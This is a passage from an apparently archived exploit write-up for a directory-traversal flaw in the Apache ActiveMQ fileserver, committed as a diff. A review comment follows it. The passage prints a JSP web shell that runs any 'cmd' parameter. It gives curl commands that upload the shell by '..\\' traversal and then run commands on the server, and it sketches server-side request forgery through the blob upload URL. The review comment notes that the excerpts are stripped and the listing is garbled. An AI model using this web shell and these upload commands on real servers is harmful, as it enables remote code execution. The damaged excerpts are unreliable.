"); + Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } + %> +
+ + +Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context: + +$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp + +And pop a calc on the server: + +$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe + +Exploiting non-Windows servers + +All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked. +That said, clients can specify the uploadUrl for a blob transfer, e.g.: + +tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com + +An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers. + +Resolution + +The ActiveMQ project has released an advisory and patches. +This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind. +It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account. \ No newline at end of file
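Review bot: The committed text has lost the excerpts it introduces: `The default conf/jetty.xml includes:` is followed only by blank lines, and the cmd.jsp listing is missing its HTML and form markup (the `out.println` string is split across two lines where a tag was stripped), so the stored file neither shows the jetty.xml setting under discussion nor a listing that matches the prose; restore the excerpts from the original advisory or reword the introducing sentences to say the content is omitted. Unlike 40856.txt in the same commit, this file carries no exploit-db header: the affected versions (`5.11.1/5.13.2`), the original date (`2015-08-17`) and the author exist only in the files.csv entry, and no CVE is cited for this issue although CVE-2014-7816 is named for an unrelated one; add a header block with `# Exploit Title`, `# Date`, `# Exploit Author`, `# Version` and `# CVE: <id from the ActiveMQ advisory>`. The Resolution section says the project released patches but not which release contains the fix; naming the fixed version would let readers check their exposure.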